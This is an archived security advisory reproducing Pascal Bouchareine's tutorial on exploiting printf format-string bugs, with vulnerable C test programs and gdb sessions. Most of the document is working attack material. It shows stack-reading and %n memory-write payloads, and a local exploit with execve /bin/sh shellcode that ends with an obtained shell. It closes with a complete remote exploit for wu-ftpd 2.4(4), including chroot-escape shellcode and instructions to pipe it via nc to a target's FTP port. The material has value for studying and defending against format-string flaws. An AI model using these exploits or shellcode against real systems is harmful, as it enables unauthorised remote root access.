COMMAND
Format bugs
SYSTEMS AFFECTED
Most systems
PROBLEM
Pascal Bouchareine posted following. This paper tries to explain
how to exploit a printf(userinput) format bug, reported in some
advisories. The approach is primary, and more precisely does not
take into account any existing exploit (wu-ftpd, ...).
A general knowledge of C programming and assembler is assumed
throughout this article (stack issues, registers, endian storage).
Let's begin with an experiment. Have a look at the following code:
void main()
{
char tmp[512];
char buf[512];
while(1) {
memset(buf, '\0', 512);
read(0, buf, 512);
sprintf(tmp, buf);
printf("%s", tmp);
}
}
It allocates a stack for tmp and buf (buf having the lower address
on the stack), reads user input into buf, calls sprintf to fill
tmp and prints out tmp. Let's try it :
[pb@camel][formats]> ./t
foo-bar
foo-bar
%x %x %x %x
25207825 78252078 a782520 0
Clumsy coders are used to see this kind of things, but let's see
exactly what happens.
When sprintf encounters a conversion string, it simply takes the
first pushed word (32 bits, 4 bytes on intel) on the stack and in
the case of "%x" converter, prints it to screen as hexadecimal.
If arguments are explicitly given, it works well, but if they are
missing and supposing sprintf's stack is empty, the function hits
the caller's stack directly, provided that the stack is growing
downward (intel architecture in the example). For more details,
let's look at this second example:
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(gdb) break sprintf
Breakpoint 1 at 0x80481f3
(gdb) run
Starting program: /usr/home/pb/code/format/./t
%x
Breakpoint 1, 0x80481f3 in _IO_sprintf ()
(gdb) x/20x $esp
0xbffff670: 0xbffffa80 0x080481af 0xbffff880 0xbffff680
0xbffff680: 0x000a7825 0x00000000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000000 0x00000000 0x00000000
* 0xbffffa80 and 0x08481af are a plain stack frame footer
* 0xbffffa80 is the calling function's stack frame address
* 0x08481af is the return address in main().
Then there are two arguments for sprintf:
* 0xbffff880 is tmp[]'s address
* 0xbffff680 is buf[]'s address
Look at what's just after this at address 0xbffff680.
Yep, this is the beginning of main's stack frame, with the 0x400
alloc'ed bytes for tmp[] and buf[] where there is what have been
entered as input:
0x000a7825 (little endian : %x\n).
Let's look at the first example again:
[pb@camel][formats]> ./t
%x %x %x %x
25207825 78252078 a782520 0
The %x converter makes sprintf hit a part of the stack where you
have:
"\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00"
This is buf[]'s content, with the 0 terminating byte [a word in
this case].
Let's study it more in detail, adding a function named do_it, with
a 4 bytes stack of 0x04030201, and let's see what happens when
sprintf(dst, "%x") is called from it:
void do_it(char *d, char *s)
{
char buf[] = "\x01\x02\x03\x04";
sprintf(d, s);
}
main()
{
char tmp[512];
char buf[512];
while(1) {
memset(buf, '\0', 512);
read(0, buf, 512);
do_it(tmp, buf);
printf("%s", tmp);
}
}
Of course, sprintf is expected to hit do_it()'s buf[] word, using
%#010x as format converter:
[pb@camel][formats]> ./t
%#010x
0x04030201
So one has access to do_it()'s stack contents, and can guess
main()'s stack frame address, and do_it's return address with
ease:
[pb@camel][formats]> ./t
%#010x %x %x %x
0x04030201 bffffa00 bffffac0 80485af
Oh, let's suppose this second pointer (0xbffffa00) is alloc'ed to
push sprintf's argument, but 0xbffffac0 and 0x080485af are really
the saved ebp, return address:
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
(gdb) x/2x $ebp
0xbffff6b0: 0xbffffac0 0x080485af
So easily, one has access to the calling function's stack frame
address.
In this example, you can easily remotely guess the location of a
return address (main's, for example) to overwrite AND the address
of the eggshell (if any): this is done by adding 0x04 to the
caller's saved $ebp (the second element of this ($ebp, ret) pair
is at 0xbffffac0 + 0x04 == 0xbffffac4):
(gdb) x 0xbffffac4
0xbffffac4: 0x080484be
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
#2 0x80484be in ___crt_dummy__ ()
So main's return address (#2) is in ___crt_dummy__ for the time
being, but can be changed to anything you want if you can
overwrite contents of 0xbffffac4...
And for eggshell address, there are many ways to guess. The
simplest way is to find buf[]'s address, which is [bottom of
main's stack] - 0x200 + some stack allocated informations:
(gdb) break memset
Breakpoint 1 at 0x8048408
(gdb) c
Continuing.
%#010x %x %x %x
0x04030201 bffffa00 bffffa20 80485af
Breakpoint 1, 0x40078428 in memset ()
(gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20
%#010x %x %x %x
Although this quite depends on the program you are running, you
can see that methods to find a stack writable return address and
a stack executable eggshell are quite easy.
However, the best way to guess stack architecture remotely, when
one has no access to the running process, is to "eat" the stack
with many "%x" or "%...s" format converters until a [stack
address, code segment address] pair is found and the user input
string itself is dumped.
Eating stack space with "junk" format converters until the
beginning of input string is found is a really nice way to control
what happens next: you now have controllable arguments to "%*"
format converters, and this really, really comes in handy. Have
a look at this (using the first example):
[pb@camel][formats]> ./t
AAAA%x
AAAA41414141
Remember, the stack is empty. The %x converter makes sprintf take
the beginning of the input buffer as an arg-list for the format
strings.
One has *many* ways to play around with this.
This "let me control the stack" feature is your friend just as gdb
is. You can dump the whole stack, guess stack addresses, and even
write to it (as will be explained later using %n converter).
Let's look at this example :
static char find_me[] = "..Buffer was lost in memory\n";
main()
{
char buf[512];
char tmp[512];
while(1) {
memset(buf, '\0', 512);
read(0, buf, 512);
sprintf(tmp ,buf);
printf("%s", tmp);
}
}
The goal is to print the string find_me[]. In this simple example,
you don't have to search (by %x dummy converters) how many bytes
of stack you need to "eat" before you hit the input buffer: this
is the very first one (the example with "AAAA%x" showed it quite
clearly). So you basically just have to issue the following
"pseudo string" to print out the buffer:
[4 bytes address of find_me]%s
Yes! It is *that* simple: in this case, the input buffer is both
the format string AND the format string argument...).
Let's do it simply :
[pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v
(garbage)Buffer was lost in memory
The garbage is the beginning of the format string. So, you are
able to dump any part of memory you need to. What was true with
remote buffer overflows is not anymore: you dont NEED to seek
return address anymore. You don't need to guess anything, since
you can inspect memory to find it. (Er, this is true with
printf() issues, but not when you can't see what the input
produced. See setproctitle() for example).
Then comes the second (and more funny) part.
All that wouldn't be that funny if we didn't have the "%n" format
converter. This one takes an (int *) argument, and writes the
number of bytes written *so far* to that location.
Let's try this (with the very-simple-AAAA%x proggy again):
[pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(no debugging symbols found)...
(gdb) set args < file
(gdb) break main
Breakpoint 1 at 0x8048529
(gdb) run
Starting program: /usr/home/pb/code/format/./t < file
(no debugging symbols found)...
Breakpoint 1, 0x8048529 in main ()
(gdb) watch *0xbffff770
Hardware watchpoint 2: *3221223280
(gdb) c
Continuing.
Hardware watchpoint 2: *3221223280
Old value = 0
New value = 4
0x400323f3 in vfprintf ()
(gdb) x 0xbffff770
0xbffff770: 0x00000004
This time, 4 bytes encoded into the format string (an address) are
written and the "%n" converter made sprintf report this where it
was told to (i.e. 0xbffff770).
Let's play with this a little more. This time, the generated-file
looks like this:
printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file
After two watchpoint hits, at 0xbffff770 you have:
(gdb) x 0xbffff770
0xbffff770: 0x00000808
sprintf wrote 8 bytes (two addresses), and "%n" made it report
this to 0xbffff770 and 0xbffff771.
Now, suppose you have an eggshell at 0xbffff710, and the guessed
return address lies at 0xbffffa80. You can't afford to write
0xbffff710 bytes into the buffer to make sprintf (through the "%n"
converter) write this value on the stack. Remember people are
usually affraid of buffer overflows and therefore cut their input
buffers).
But you can use a byte-per-byte construction to build the address.
Since "%n" makes sprintf write the number of bytes written so far
on the stack, you need to substract the number of bytes already
written to each following fragment.
Since the int * thing would erase bytes already written, you have
to write address from the lower significant byte to the higher
significant byte.
Since you need to have written 0xff bytes before you can write the
0xbf byte, and moreover, you can only *increment* the internal
number-of-written-bytes counter, you have to use 0x1bf, erasing a
meaningless byte on the stack.
Note that you could use the "%hn" converter, and make sprintf
write short int arguments to the stack. But this won't be
discussed here. Here is the "address builder" code explain so
far:
main()
{
char b1[255];
char b2[255];
char b3[255];
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b1, '\x90', 0xf7 - 0x10);
memset(b2, '\x90', 0xff - 0xf7);
memset(b3, '\x90', 0x01bf - 0xff);
printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter.
"\x81\xfa\xff\xbf" // ditto
"\x82\xfa\xff\xbf" // ..
"\x83\xfa\xff\xbf" // last byte.
"%%n" // 1) gives 0x10 ( 16 first bytes )
"%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10
"%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7
"%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff
,b1, b2, b3);
// you now have 0xbffff710 at 0xbffffa80
}
Let's try it:
(after 3 hits on watchpoint)
(gdb) c
Continuing.
Hardware watchpoint 3: *3221224064
Old value = 16774928
New value = -1073744112
0x400323f3 in vfprintf ()
(gdb) x/2 0xbffffa80
0xbffffa80: 0xbffff710 0xbf000001
Is seems to work quite well. The work is almost finished now, you
just have to push an eggshell after all this format trick, and
make the program jump back in it. Let's try to apply everything
said before, with the following vulnerable program:
void do_it(char *dst, char *src)
{
int foo;
char bar;
sprintf(dst, src);
}
main()
{
char buf[512];
char tmp[512];
memset(buf, '\0', 512);
read(0, buf, 512);
do_it(tmp, buf);
printf("%s", tmp);
}
1) First you have to find where's your input buffer, to control
the format string.
[pb@camel][formats]> gcc vuln.c -o v
[pb@camel][formats]> ./v
AAAA %x %c %x
AAAA 0 À bffffac0
(int foo, char bar, stack)
...
AAAA %x %x %x %x %x %x %x %x %x
AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666
(the *output* buffer is at offset 28)
Look at the stack frame, which is a (stack addr, code addr) pair:
the return address in main is 0x0804859f, main's stack saved ebp
and ret addr begins at 0xbffffac0.
You now know that main's return address is at 0xbffffac4 (the
second part of the [stack, code] pair is of course at pair + 4).
Then you get some information about main's return address:
printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v | hexdump
0000000 4141 4141 fac0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fad4 bfff 84be 0804 0a01 000a
stack/ret is 0xbffffad4/0x080484be (check this with gdb).
Supposing do_it's frame is something like 0x400 bytes before
main's frame, (in fact, it is 0x410 bytes), you can find do_it's
stack frame address, since you know that there must be main's
saved frame pointer followed by a code segment return address,
then by main's stack:
After a lot of tries you have:
printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v | hexdump
0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff
0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000060 6230 6666 6666 6361 3830 3430 3538 3838
0000070 6662 6666 3666 3063 6662 6666 3866 3063
0000080 3134 3134 3134 3134 7720 2065 7274 2079
0000090 0a0a
(this prints "..we try [contents of 0xbffff6b0]) Bingo! There
you have (we try .. is just before offset 0x40)
0xbffffac0,0x08048588 at 0xbffff6b0.
Remember the (stack, code) pair addresses? This is in fact do_it's
stack frame. You can see sprintf's args just after: 0xbffff6c0
and 0xbffff8c0. These are addresses of the two buffers.
0x41414141 is the beginning of the input buffer, so you can see
that hexdump's offset 0x50 is at address 0xbffff6c0, and since
you are good at math, you confirm that hexdump's offset 0x40 is
indeed at 0xbffff6b0.
This process lets you remotely guess
1) stack return address,
2) buffer address.
You have all the information you need to format the stack, so
let's get to the next step: build the eggshell & the appropriate
buffer.
The buffer will lie at 0xbffff8c0. BUT, since it is filled with
lots of illegal instructions (i.e. the format converters), the
"\x90" string must end with a "\xeb\x02" to jump over the "%n"
format converters, therefore, you need not worry about the
effective egg address.
So all you need to do is to push 4 addresses (one address per byte
of the return address to overwrite), a series of "%x" converters
to "eat" stack space, then a series of nops followed by a "%n"
converter (in order to build the return address) and somewhere
the eggshell.
Tough this is not the easiest part, a little brain boost (coffe,
cocaine, coca-cola(tm), anything you like) leads to:
void main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28);
// 16 (4 addresses)
// 2 (%n)
// 40 (%x output - "guess it..")
// use nice formats for
// fixed output size... :)
// + 200- (4 bytes)
memset(b2, '\x90', 0xf8 - 0xd0 - 2); // first 0x90 string is at
// 0xbffff8d0.. (c0 + 4 * 4 bytes) :)
// -2 because of "\xeb\x02"
memset(b3, '\x90', 0xff - 0xf8 - 2); // ditto, with -2.
memset(b4, '\x90', 0x01bf - 0xff - 2); // ditto.
printf("\xb4\xf6\xff\xbf" //
"\xb5\xf6\xff\xbf" // this points to do_it's
"\xb6\xf6\xff\xbf" // return address storage word.
"\xb7\xf6\xff\xbf" //
"%s" // 0) there are 6 "%x", to eat stack until the input buf
// begins to control the format strings.
"%s\xeb\x02%%n" // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored )
"%s\xeb\x02%%n" // 2) gives 0xf9
"%s\xeb\x02%%n" // 3) gives 0xff
"%s\xeb\x02%%n%s" // 4) gives 0x01bf
, xx, b1, b2, b3, b4, egg);
}
Let's give it a final try:
[pb@camel][formats]> ( ./b ; cat ) | ./v
id
uid=1001(pb) gid=100(users) groups=100(users)
date
Sat Jul 15 22:15:07 CEST 2000
These format bugs are really nasty. First, if you can read the
output of the final buffer (e.g. printf(Userinput)), you obviously
have control over the computer processing it. You have some kind
of remote-debugger-access to the machine, that allows you to get
in at the first try. These are bad news for developpers. (wu-ftpd
format bug used by an aware person is a one-try remote root..).
Playing around format args and pointers allows us to construct
some kind of "generic format string" that will overwrite
*certainly* the caller's return address. This must be coupled
with a remote return address guess to work properly, but gives
*at least* the same luck rate as remote buffer overruns. Even if
you don't see what you do (setproctitle), this is still an easy
way to get in.
This is what Pascal built against his old wu-ftpd [wu-2.4(4)]
using the above technique. It worked, but he had to cut his
intput format string to 512 bytes: he included the eggshell in
another part of memory, using the PASS command. This address is
still easy to guess.
/*
* Sample example - part 2: wu-ftpd v2.4(4), exploitation.
*
* usage:
* 1) find the right address location/eggshell location
* this is easy with a little play around %s and hexdump.
* Then, fix this exploit.
*
* 2) (echo "user ftp"; ./exploit; cat) | nc host 21
*
* echo ^[c to clear your screen if needed.
*
* Don't forget 0xff must be escaped with 0xff.
*
*
*/
main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
"\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xa3 - 0x50);
memset(b2, '\x90', 0xfe - 0xa3 - 2);
memset(b3, '\x90', 0xff - 0xfe);
memset(b4, '\x90', 0x01bf - 0xff); // build ret address here.
// i found 0xbffffea3
printf("pass %s@oonanism.com\n", egg);
printf("site exec .."
"\x64\xf9\xff\xff\xbf" // insert ret location there.
"\x65\xf9\xff\xff\xbf" // i had 0xbffff964
"\x66\xf9\xff\xff\xbf"
"\x67\xf9\xff\xff\xbf"
"%s"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s%%n"
"%s%%n\n"
, xx, b1, b2, b3, b4);
}
SOLUTION
Nothing yet.